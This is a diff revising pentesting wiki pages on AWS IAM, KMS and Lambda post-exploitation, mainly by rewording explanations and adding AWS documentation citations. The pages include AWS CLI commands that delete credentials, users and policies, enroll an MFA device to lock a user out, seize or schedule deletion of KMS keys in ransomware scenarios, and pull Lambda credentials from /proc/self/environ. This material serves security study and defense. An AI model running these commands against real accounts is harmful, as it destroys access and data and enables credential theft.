+This policy **allows any account** to configure API Gateway resources that invoke this Lambda. Lambda documents that a service principal without a source restriction can be used by other accounts to configure resources in their accounts to invoke the function.<sup>[[3]](#references)</sup>
 
-#### S3 as principal
+#### S3 source-bucket conditions
 
 ```json
 "Condition": {
@@ -81,23 +79,34 @@ This policy **allows any account** to configure their apigateway to call this La
 }
 ```
 
-If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this.
+When a service integration refers to an S3 bucket by ARN, deleting the bucket and allowing another account to recreate the same name can let that account satisfy the source ARN check. Pair `aws:SourceArn` with `aws:SourceAccount` so that the bucket name and owning account are both constrained.<sup>[[3]](#references)</sup>
 
-#### Not supported
+#### CloudTrail source conditions
 
 ```json
 {
   "Effect": "Allow",
   "Principal": { "Service": "cloudtrail.amazonaws.com" },
   "Action": "s3:PutObject",
-  "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
+  "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*",
+  "Condition": {
+    "ArnEquals": {
+      "aws:SourceArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/example-trail"
+    },
+    "StringEquals": {
+      "aws:SourceAccount": "123456789012"
+    }
+  }
 }
 ```
 
-A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources).
+A common way to avoid cross-service confused deputy problems is to constrain a service principal with `aws:SourceArn` and/or `aws:SourceAccount`. CloudTrail supports these condition keys; replace the example trail ARN with the specific trail that should write to the bucket.<sup>[[1]](#references)[[4]](#references)</sup>
 
-### Credential Deletion 
-With any of the following permissions — `iam:DeleteAccessKey`, `iam:DeleteLoginProfile`, `iam:DeleteSSHPublicKey`, `iam:DeleteServiceSpecificCredential`, `iam:DeleteInstanceProfile`, `iam:DeleteServerCertificate`, `iam:DeleteCloudFrontPublicKey`, `iam:RemoveRoleFromInstanceProfile` — an actor can remove access keys, login profiles, SSH keys, service-specific credentials, instance profiles, certificates or CloudFront public keys, or disassociate roles from instance profiles. Such actions can immediately block legitimate users and applications and cause denial-of-service or loss of access for systems that depend on those credentials, so these IAM permissions must be tightly restricted and monitored.
+### Credential Deletion
+
+With any of the following permissions — `iam:DeleteAccessKey`, `iam:DeleteLoginProfile`, `iam:DeleteSSHPublicKey`, `iam:DeleteServiceSpecificCredential`, `iam:DeleteInstanceProfile`, `iam:DeleteServerCertificate`, `iam:RemoveRoleFromInstanceProfile` — an actor can remove access keys, login profiles, SSH keys, service-specific credentials, instance profiles, or certificates, or disassociate roles from instance profiles.<sup>[[6]](#references)</sup>
+
+These changes can invalidate the corresponding access path or disrupt a dependent workload. For example, deleting a login profile removes the console password but does not remove API or CLI access keys, while removing a role from an instance profile associated with a running EC2 instance can break applications on that instance.<sup>[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 # Remove Access Key of a user
@@ -112,7 +121,8 @@ aws iam delete-ssh-public-key \
 ```
 
 ### Identity Deletion
-With permissions like `iam:DeleteUser`, `iam:DeleteGroup`, `iam:DeleteRole`, or `iam:RemoveUserFromGroup`, an actor can delete users, roles, or groups—or change group membership—removing identities and associated traces. This can immediately break access for people and services that depend on those identities, causing denial-of-service or loss of access, so these IAM actions must be tightly restricted and monitored.
+
+With permissions like `iam:DeleteUser`, `iam:DeleteGroup`, `iam:DeleteRole`, or `iam:RemoveUserFromGroup`, an actor can delete users, roles, or groups—or change group membership.<sup>[[6]](#references)</sup> Deleting an identity or removing it from a group can immediately remove access for people and services that depend on it; deleting a role or removing its instance-profile role while an instance is running can also break applications on that instance.<sup>[[9]](#references)[[10]](#references)[[11]](#references)[[8]](#references)</sup>
 
 ```bash
 # Delete a user
@@ -128,8 +138,9 @@ aws iam delete-role \
   --role-name <Role>
 ```
 
-### 
-With any of the following permissions — `iam:DeleteGroupPolicy`, `iam:DeleteRolePolicy`, `iam:DeleteUserPolicy`, `iam:DeletePolicy`, `iam:DeletePolicyVersion`, `iam:DeleteRolePermissionsBoundary`, `iam:DeleteUserPermissionsBoundary`, `iam:DetachGroupPolicy`, `iam:DetachRolePolicy`, `iam:DetachUserPolicy` — an actor can delete or detach managed/inline policies, remove policy versions or permissions boundaries, and unlink policies from users, groups, or roles. This destroys authorizations and can alter the permissions model, causing immediate loss of access or denial-of-service for principals that depended on those policies, so these IAM actions must be tightly restricted and monitored.
+### Policy and Permission Boundary Deletion
+
+With any of the following permissions — `iam:DeleteGroupPolicy`, `iam:DeleteRolePolicy`, `iam:DeleteUserPolicy`, `iam:DeletePolicy`, `iam:DeletePolicyVersion`, `iam:DeleteRolePermissionsBoundary`, `iam:DeleteUserPermissionsBoundary`, `iam:DetachGroupPolicy`, `iam:DetachRolePolicy`, `iam:DetachUserPolicy` — an actor can delete or detach managed/inline policies, remove policy versions or permissions boundaries, and unlink policies from users, groups, or roles.<sup>[[6]](#references)</sup> These changes remove or alter authorizations; AWS documents managed-policy deletion as permanent and separately documents deleting inline policies, detaching managed policies, and removing permissions boundaries.<sup>[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 # Delete a group policy
@@ -144,7 +155,8 @@ aws iam delete-role-policy \
 ```
 
 ### Federated Identity Deletion
-With `iam:DeleteOpenIDConnectProvider`, `iam:DeleteSAMLProvider`, and `iam:RemoveClientIDFromOpenIDConnectProvider`, an actor can delete OIDC/SAML identity providers or remove client IDs. This breaks federated authentication, preventing token validation and immediately denying access to users and services that rely on SSO until the IdP or configurations are restored.
+
+With `iam:DeleteOpenIDConnectProvider`, `iam:DeleteSAMLProvider`, and `iam:RemoveClientIDFromOpenIDConnectProvider`, an actor can delete OIDC/SAML identity providers or remove client IDs.<sup>[[6]](#references)</sup> OIDC and SAML providers are used as federated principals for STS role sessions, so deleting a provider or removing a client ID can break federation for dependent users and workloads until the trust configuration is restored.<sup>[[2]](#references)</sup>
 
 ```bash
 # Delete OIDCP provider
@@ -156,8 +168,11 @@ aws iam delete-saml-provider \
   --saml-provider-arn arn:aws:iam::111122223333:saml-provider/CorporateADFS
 ```
 
-### Illegitimate MFA Activation
-With `iam:EnableMFADevice`, an actor can register an MFA device on a user’s identity, preventing the legitimate user from signing in. Once an unauthorized MFA is enabled the user can be locked out until the device is removed or reset (note: if multiple MFA devices are registered, sign-in requires only one, so this attack will have no effect on denying access).
+### `iam:EnableMFADevice` — Illegitimate MFA Activation
+
+An actor granted `iam:EnableMFADevice` can enable an MFA device and associate it with an IAM user. AWS states that an enabled device is required for every subsequent login by that user.<sup>[[14]](#references)</sup> If the user has no device they control, registering an attacker-controlled device can prevent the legitimate user from signing in; however, IAM users can have up to eight MFA devices and need only one to authenticate, so adding a device does not block a user who can still use an existing device.<sup>[[15]](#references)</sup>
+
+To enable (register) a virtual MFA device for a user, an attacker could run:
 
 ```bash
 aws iam enable-mfa-device \
@@ -168,7 +183,8 @@ aws iam enable-mfa-device \
 ```
 
 ### Certificate/Key Metadata Tampering
-With `iam:UpdateSSHPublicKey`, `iam:UpdateCloudFrontPublicKey`, `iam:UpdateSigningCertificate`, `iam:UpdateServerCertificate`, an actor can change status or metadata of public keys and certificates. By marking keys/certificates inactive or altering references, they can break SSH authentication, invalidate X.509/TLS validations, and immediately disrupt services that depend on those credentials, causing loss of access or availability.
+
+With `iam:UpdateSSHPublicKey`, `iam:UpdateSigningCertificate`, or `iam:UpdateServerCertificate`, an actor can change the status or metadata of public keys and certificates.<sup>[[6]](#references)</sup> Marking an SSH public key inactive disables its CodeCommit authentication use; disabling a signing certificate prevents it from being used for programmatic calls; and changing a server certificate's name or path can affect services that reference it.<sup>[[16]](#references)[[17]](#references)[[18]](#references)</sup>
 
 ```bash
 aws iam update-ssh-public-key \
@@ -183,7 +199,7 @@ aws iam update-server-certificate \
 
 ### `iam:Delete*`
 
-The IAM wildcard iam:Delete* grants the ability to remove many kinds of IAM resources—users, roles, groups, policies, keys, certificates, MFA devices, policy versions, etc. —and therefore has a very high blast radius: an actor granted iam:Delete* can permanently destroy identities, credentials, policies and related artifacts, remove audit/evidence, and cause service or operational outages. Some examples are
+The IAM `Action` element accepts wildcards within action names, so `iam:Delete*` matches IAM actions whose names begin with `Delete`. The current IAM action reference includes deletion actions for users, roles, groups, policies and versions, credentials, providers, certificates, and MFA devices; this gives the permission a broad destructive scope.<sup>[[5]](#references)[[6]](#references)</sup> Some examples are:
 
 ```bash
 # Delete a user
@@ -196,27 +212,25 @@ aws iam delete-role --role-name <RoleName>
 aws iam delete-policy --policy-arn arn:aws:iam::<ACCOUNT_ID>:policy/<PolicyName>
 ```
 
-### `iam:EnableMFADevice`
-
-An actor granted the iam:EnableMFADevice action can register an MFA device on an identity in the account, provided the user did not already have one enabled. This can be used to interfere with a user’s access: once an attacker registers an MFA device, the legitimate user may be prevented from signing in because they do not control the attacker-registered MFA.
-
-This denial-of-access attack only works if the user had no MFA registered; if the attacker registers an MFA device for that user, the legitimate user will be locked out of any flows that require that new MFA. If the user already has one or more MFA devices under their control, adding an attacker-controlled MFA does not block the legitimate user — they can continue to authenticate using any MFA they already have.
-
-To enable (register) an MFA device for a user an attacker could run:
-```bash
-aws iam enable-mfa-device \
-  --user-name <Username> \
-  --serial-number arn:aws:iam::111122223333:mfa/alice \
-  --authentication-code1 123456 \
-  --authentication-code2 789012
-```
-
 ## References
 
-- [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html)
+- [1] [The confused deputy problem](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html)
+- [2] [AWS JSON policy elements: Principal](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_principal.html)
+- [3] [AddPermission](https://docs.aws.amazon.com/lambda/latest/api/API_AddPermission.html)
+- [4] [Cross-service confused deputy prevention](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cross-service-confused-deputy-prevention.html)
+- [5] [IAM JSON policy elements: Action](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_action.html)
+- [6] [Actions, resources, and condition keys for AWS Identity and Access Management (IAM)](https://docs.aws.amazon.com/service-authorization/latest/reference/list_iam.html)
+- [7] [DeleteLoginProfile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteLoginProfile.html)
+- [8] [RemoveRoleFromInstanceProfile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_RemoveRoleFromInstanceProfile.html)
+- [9] [DeleteUser](https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteUser.html)
+- [10] [DeleteGroup](https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteGroup.html)
+- [11] [DeleteRole](https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteRole.html)
+- [12] [Delete IAM policies](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_manage-delete.html)
+- [13] [Adding and removing IAM identity permissions](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_manage-attach-detach.html)
+- [14] [EnableMFADevice](https://docs.aws.amazon.com/IAM/latest/APIReference/API_EnableMFADevice.html)
+- [15] [AWS Multi-factor authentication in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html)
+- [16] [UpdateSSHPublicKey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSSHPublicKey.html)
+- [17] [UpdateSigningCertificate](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSigningCertificate.html)
+- [18] [UpdateServerCertificate](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateServerCertificate.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - KMS Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## KMS
 
 For more information check:
@@ -12,13 +10,12 @@ For more information check:
 
 ### Encrypt/Decrypt information
 
-`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files:
-
-- `fileb://:` Reads the file in binary mode, commonly used for non-text files.
-- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements.
+`file://` loads a parameter value from a file, while `fileb://` passes the file's raw bytes. For binary parameters such as `--ciphertext-blob`, use `fileb://`; the file must contain binary ciphertext rather than base64-encoded text.<sup>[[1]](#references)</sup>
 
 > [!TIP]
-> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://)
+> When decrypting a file with `--ciphertext-blob fileb://...`, provide the binary ciphertext file rather than a base64-encoded file.<sup>[[1]](#references)</sup>
+
+KMS `Encrypt` accepts symmetric and asymmetric encryption keys. Asymmetric requests require an encryption algorithm, and `Decrypt` must use the same key and algorithm; symmetric ciphertext carries the metadata needed to identify the key and algorithm.<sup>[[2]](#references)[[3]](#references)</sup>
 
 - Using a **symmetric** key
 
@@ -64,14 +61,12 @@ aws kms decrypt \
 
 ### KMS Ransomware
 
-An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account.
-
-Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account.
+An attacker who can change a customer managed KMS key's policy (for example, with `kms:PutKeyPolicy`) can **grant an attacker-controlled principal access** and remove legitimate principals. Because the key policy controls who may use the key, this can block decryption of data protected by the key and create a ransomware-like outage.<sup>[[4]](#references)[[5]](#references)</sup>
 
 > [!WARNING]
-> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**.
+> AWS managed key policies are maintained by the AWS service and cannot be changed; this scenario applies to **customer managed keys**.<sup>[[5]](#references)</sup>
 
-> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI).
+> The **`--bypass-policy-lockout-safety-check`** option bypasses KMS's check that the caller will retain permission to submit a later policy update. It can leave the key unmanageable and should be used only when that lockout is intentional.<sup>[[4]](#references)</sup>
 
 ```bash
 # Force policy change
@@ -97,23 +92,25 @@ aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
 }
 ```
 
+The account-principal statement shown above is the default pattern AWS documents for allowing account IAM policies to delegate access to a KMS key.<sup>[[6]](#references)</sup>
+
 > [!CAUTION]
-> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able cause the Put Polocy action cannot be performed from a cross account**.
+> `PutKeyPolicy` cannot be called cross-account. If a replacement policy grants access only to an external account, that account cannot call `PutKeyPolicy` to restore the original account's access; recovery must come from the owning account or another principal that retained policy-update access.<sup>[[4]](#references)[[5]](#references)</sup>
 
 <figure><img src="../../../images/image (77).png" alt=""><figcaption></figcaption></figure>
 
 ### Generic KMS Ransomware
 
-There is another way to perform a global KMS Ransomware, which would involve the following steps:
+A broader ransomware scenario can use an attacker-controlled imported key as the destination for ciphertext that the attacker is authorized to re-encrypt. `ReEncrypt` runs inside KMS and requires authorization on both the source and destination keys; it is not a generic conversion method for every service's ciphertext format.<sup>[[7]](#references)[[8]](#references)</sup>
 
-- Create a new **key with a key material** imported by the attacker
-- **Re-encrypt older data** of the victim encrypted with the previous version with the new one.
-- **Delete the KMS key**
-- Now only the attacker, who has the original key material could be able to decrypt the encrypted data
+- Create a new **key with key material** imported and controlled by the attacker.<sup>[[8]](#references)</sup>
+- **Re-encrypt eligible ciphertext** from the victim's key under the attacker-controlled key. This requires `kms:ReEncryptFrom` on the source key and `kms:ReEncryptTo` on the destination key.<sup>[[7]](#references)</sup>
+- **Schedule the victim KMS key for deletion** and let the 7-30 day waiting period expire.<sup>[[10]](#references)</sup>
+- After deletion, ciphertext that still depends on the victim key is unrecoverable. Ciphertext moved to the attacker-controlled key remains decryptable by whichever principals that key's policy permits, not necessarily only the attacker.<sup>[[7]](#references)[[8]](#references)[[10]](#references)</sup>
 
 ### Delete Keys via kms:DeleteImportedKeyMaterial
 
-With the `kms:DeleteImportedKeyMaterial` permission, an actor can delete the imported key material from CMKs with `Origin=EXTERNAL` (CMKs that have imported their key material), making them unable to decrypt data. This action is destructive and irreversible unless compatible material is re-imported, allowing an attacker to effectively cause ransomware-like data loss by rendering encrypted information permanently inaccessible.
+With the `kms:DeleteImportedKeyMaterial` permission, an actor can delete imported key material from a KMS key whose `Origin=EXTERNAL`. The key enters `PendingImport` and cannot perform cryptographic operations until the same material is reimported; if the original material is unavailable, protected data may become inaccessible, creating ransomware-like disruption.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 aws kms delete-imported-key-material --key-id <Key_ID>
@@ -122,20 +119,20 @@ aws kms delete-imported-key-material --key-id <Key_ID>
 
 ### Destroy keys
 
-Destroying keys it's possible to perform a DoS.
+Scheduling deletion places the key in `PendingDeletion`, where it cannot be used for cryptographic operations during the 7-30 day waiting period. After the waiting period, AWS KMS permanently deletes the key and its key material, making ciphertext encrypted under it unrecoverable. This can cause a denial of service and data loss.<sup>[[10]](#references)</sup>
 
 ```bash
-# Schedule the destoy of a key (min wait time is 7 days)
+# Schedule deletion of a key (minimum waiting period is 7 days)
 aws kms schedule-key-deletion \
     --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
     --pending-window-in-days 7
 ```
 
 > [!CAUTION]
-> Note that AWS now **prevents the previous actions from being performed from a cross account:**
+> Key-management APIs in this page, including `PutKeyPolicy`, `DeleteImportedKeyMaterial`, and `ScheduleKeyDeletion`, do not support cross-account calls; the caller must operate in the owning account.<sup>[[4]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ### Change or delete Alias
-This attack deletes or redirects AWS KMS aliases, breaking key resolution and causing immediate failures in any services that rely on those aliases, resulting in a denial-of-service. With permissions like `kms:DeleteAlias` or `kms:UpdateAlias` an attacker can remove or repoint aliases and disrupt cryptographic operations (e.g., encrypt, describe). Any service that references the alias instead of the key ID may fail until the alias is restored or correctly remapped.
+An alias is independent of its KMS key: deleting it does not delete the key, but can break applications that use the alias. `UpdateAlias` re-associates an existing alias with another compatible key. An attacker with `kms:DeleteAlias` or `kms:UpdateAlias` can therefore make alias-based clients fail or resolve operations to an unintended key, causing a denial of service or other impact.<sup>[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 # Delete Alias
@@ -148,61 +145,86 @@ aws kms update-alias \
 ```
 
 ### Cancel Key Deletion
-With permissions like `kms:CancelKeyDeletion` and `kms:EnableKey`, an actor can cancel a scheduled deletion of an AWS KMS customer master key and later re-enable it. Doing so recovers the key (initially in Disabled state) and restores its ability to decrypt previously protected data, enabling exfiltration.
+With `kms:CancelKeyDeletion`, an actor can cancel a scheduled deletion. KMS then leaves the key in the `Disabled` state; with `kms:EnableKey` and the relevant cryptographic-use permission, the actor can re-enable operations and potentially regain access to ciphertext protected by the key.<sup>[[3]](#references)[[13]](#references)[[14]](#references)</sup>
 
 ```bash
-# Firts cancel de deletion
+# First, cancel the deletion
 aws kms cancel-key-deletion \
   --key-id <Key_ID>
 
-## Second enable the key
+# Second, enable the key
 aws kms enable-key \
   --key-id <Key_ID>
 ```
 
 ### Disable Key
-With the `kms:DisableKey` permission, an actor can disable an AWS KMS customer master key, preventing it from being used for encryption or decryption. This breaks access for any services that depend on that CMK and can cause immediate disruptions or a denial-of-service until the key is re-enabled.
+With the `kms:DisableKey` permission, an actor can disable a KMS key, temporarily preventing cryptographic operations such as encryption and decryption. Services that depend on the key can fail until it is re-enabled.<sup>[[15]](#references)</sup>
 
 ```bash
- aws kms disable-key \
+aws kms disable-key \
   --key-id <key_id>
 ```
 
 ### Derive Shared Secret
-With the `kms:DeriveSharedSecret` permission, an actor can use a KMS-held private key plus a user-supplied public key to compute an ECDH shared secret.
+With the `kms:DeriveSharedSecret` permission, an actor can use an asymmetric ECC key with `KEY_AGREEMENT` usage and its KMS-held private key plus a peer-supplied public key to compute an ECDH shared secret. The private key remains in KMS.<sup>[[16]](#references)</sup>
 
 ```bash
 aws kms derive-shared-secret \
   --key-id <key_id> \
-  --public-key fileb:///<route_to_public_key> \
-  --key-agreement-algorithm <algorithm>
+  --public-key fileb://<path_to_der_encoded_public_key> \
+  --key-agreement-algorithm ECDH
 ```
 
 ### Impersonation via kms:Sign
-With the `kms:Sign` permission, an actor can use a KMS-stored CMK to cryptographically sign data without exposing the private key, producing valid signatures that can enable impersonation or authorize malicious actions.
+With the `kms:Sign` permission, an actor can use an asymmetric KMS key with `SIGN_VERIFY` usage to create valid digital signatures without receiving the private key. A verifier that trusts the corresponding public key may accept those signatures, enabling impersonation or malicious authorization depending on the protocol.<sup>[[17]](#references)</sup>
 
 ```bash
 aws kms sign \
   --key-id <key-id> \
-  --message fileb://<ruta-al-archivo> \
-  --signing-algorithm <algoritmo> \
+  --message fileb://<path-to-file> \
+  --signing-algorithm <signing-algorithm> \
   --message-type RAW
 ```
 
 ### DoS with Custom Key Stores
-With permissions like `kms:DeleteCustomKeyStore`, `kms:DisconnectCustomKeyStore`, or `kms:UpdateCustomKeyStore`, an actor can modify, disconnect, or delete an AWS KMS Custom Key Store (CKS), making its master keys inoperable. That breaks encryption, decryption, and signing operations for any services that rely on those keys and can cause an immediate denial-of-service. Restricting and monitoring those permissions is therefore critical.
+With `kms:DisconnectCustomKeyStore`, an actor can disconnect an AWS KMS custom key store; while disconnected, its KMS keys cannot be used for cryptographic operations. `DeleteCustomKeyStore` requires the store to be disconnected and contain no KMS keys, while `UpdateCustomKeyStore` can alter its name, CloudHSM credentials, or backing connection. These actions can disrupt encryption, decryption, and signing for dependent services and cause a denial of service.<sup>[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ```bash
+# The store must be disconnected and contain no KMS keys before deletion
 aws kms delete-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>
 
+# Disconnecting makes the store's KMS keys unusable until it is reconnected
 aws kms disconnect-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>
 
-aws kms update-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID> --new-custom-key-store-name <NEW_NAME> --key-store-password <NEW_PASSWORD>
+# For an AWS CloudHSM key store, provide the current kmsuser password
+aws kms update-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID> --new-custom-key-store-name <NEW_NAME> --key-store-password <CURRENT_PASSWORD>
 ```
 
 
 
 <figure><img src="../../../images/image (76).png" alt=""><figcaption></figcaption></figure>
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [Loading a parameter from a file in the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-usage-parameters-file.html)
+- [2] [Encrypt - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_Encrypt.html)
+- [3] [Decrypt - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_Decrypt.html)
+- [4] [PutKeyPolicy - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_PutKeyPolicy.html)
+- [5] [Change a key policy - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-modifying.html)
+- [6] [Default key policy - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html)
+- [7] [ReEncrypt - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_ReEncrypt.html)
+- [8] [Importing key material for AWS KMS keys](https://docs.aws.amazon.com/kms/latest/developerguide/importing-keys.html)
+- [9] [DeleteImportedKeyMaterial - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_DeleteImportedKeyMaterial.html)
+- [10] [ScheduleKeyDeletion - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_ScheduleKeyDeletion.html)
+- [11] [DeleteAlias - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_DeleteAlias.html)
+- [12] [UpdateAlias - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_UpdateAlias.html)
+- [13] [CancelKeyDeletion - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_CancelKeyDeletion.html)
+- [14] [EnableKey - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_EnableKey.html)
+- [15] [DisableKey - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_DisableKey.html)
+- [16] [DeriveSharedSecret - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_DeriveSharedSecret.html)
+- [17] [Sign - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_Sign.html)
+- [18] [DisconnectCustomKeyStore - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_DisconnectCustomKeyStore.html)
+- [19] [DeleteCustomKeyStore - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_DeleteCustomKeyStore.html)
+- [20] [UpdateCustomKeyStore - AWS Key Management Service](https://docs.aws.amazon.com/kms/latest/APIReference/API_UpdateCustomKeyStore.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - Lambda Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Lambda
 
 For more information check:
@@ -12,12 +10,12 @@ For more information check:
 
 ### Exfilrtate Lambda Credentials
 
-Lambda uses environment variables to inject credentials at runtime. If you can get access to them (by reading `/proc/self/environ` or using the vulnerable function itself), you can use them yourself. They live in the default variable names `AWS_SESSION_TOKEN`, `AWS_SECRET_ACCESS_KEY`, and `AWS_ACCESS_KEY_ID`. 
+Lambda makes the execution role's temporary credentials available to the runtime through `AWS_SESSION_TOKEN`, `AWS_SECRET_ACCESS_KEY`, and `AWS_ACCESS_KEY_ID` environment variables.<sup>[[1]](#references)</sup> If you can read the process environment (for example, through `/proc/self/environ` or the vulnerable function itself), you can reuse them.
 
-By default, these will have access to write to a cloudwatch log group (the name of which is stored in `AWS_LAMBDA_LOG_GROUP_NAME`), as well as to create arbitrary log groups, however lambda functions frequently have more permissions assigned based on their intended use.
+When the execution role includes `AWSLambdaBasicExecutionRole`, the credentials can create log groups and streams and write events; `AWS_LAMBDA_LOG_GROUP_NAME` identifies the function's CloudWatch Logs group. Functions frequently have additional permissions based on their intended use.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### `lambda:Delete*`
-An attacker granted lambda:Delete* can delete Lambda functions, versions/aliases, layers, event source mappings and other associated configurations.
+An attacker granted `lambda:Delete*` can invoke destructive Delete actions for Lambda functions (including qualified versions), aliases, layers, event source mappings, and related configurations.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 aws lambda delete-function \
@@ -26,7 +24,7 @@ aws lambda delete-function \
 
 ### Steal Others Lambda URL Requests
 
-If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them.
+On susceptible runtimes, after gaining RCE inside a Lambda execution environment, an attacker can replace or control the runtime bootstrap so subsequent invocations handled by that warm environment become visible, including HTTP request data such as cookies or credentials.<sup>[[5]](#references)</sup>
 
 {{#ref}}
 aws-warm-lambda-persistence.md
@@ -34,7 +32,7 @@ aws-warm-lambda-persistence.md
 
 ### Steal Others Lambda URL Requests & Extensions Requests
 
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+An attacker who can add a Lambda layer can deploy an extension that runs alongside the function. External extensions share the execution environment and can continue through the invocation lifecycle, while the LambdaSpy proof of concept demonstrates intercepting and modifying invocation events; this can enable request theft or tampering.<sup>[[6]](#references)[[7]](#references)</sup>
 
 {{#ref}}
 ../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
@@ -42,7 +40,7 @@ Abusing Lambda Layers it's also possible to abuse extensions and persist in the 
 
 ### AWS Lambda – VPC Egress Bypass
 
-Force a Lambda function out of a restricted VPC by updating its configuration with an empty VpcConfig (SubnetIds=[], SecurityGroupIds=[]). The function will then run in the Lambda-managed networking plane, regaining outbound internet access and bypassing egress controls enforced by private VPC subnets without NAT.
+Force a Lambda function out of a restricted VPC by updating its configuration with an empty `VpcConfig` (`SubnetIds=[], SecurityGroupIds=[]`). The function then uses the Lambda-managed networking plane and normally regains outbound internet access, bypassing egress controls enforced by private VPC subnets without NAT.<sup>[[8]](#references)</sup>
 
 {{#ref}}
 aws-lambda-vpc-egress-bypass.md
@@ -50,7 +48,7 @@ aws-lambda-vpc-egress-bypass.md
 
 ### AWS Lambda – Runtime Pinning/Rollback Abuse
 
-Abuse `lambda:PutRuntimeManagementConfig` to pin a function to a specific runtime version (Manual) or freeze updates (FunctionUpdate). This preserves compatibility with malicious layers/wrappers and can keep the function on an outdated, vulnerable runtime to aid exploitation and long-term persistence.
+Abuse `lambda:PutRuntimeManagementConfig` to pin a function to a specific runtime version (`Manual`) or update it only when the function changes (`FunctionUpdate`). These controls can keep a function on an older runtime, preserving compatibility with malicious layers or wrappers and aiding exploitation or long-term persistence.<sup>[[9]](#references)</sup>
 
 {{#ref}}
 aws-lambda-runtime-pinning-abuse.md
@@ -58,7 +56,7 @@ aws-lambda-runtime-pinning-abuse.md
 
 ### AWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
 
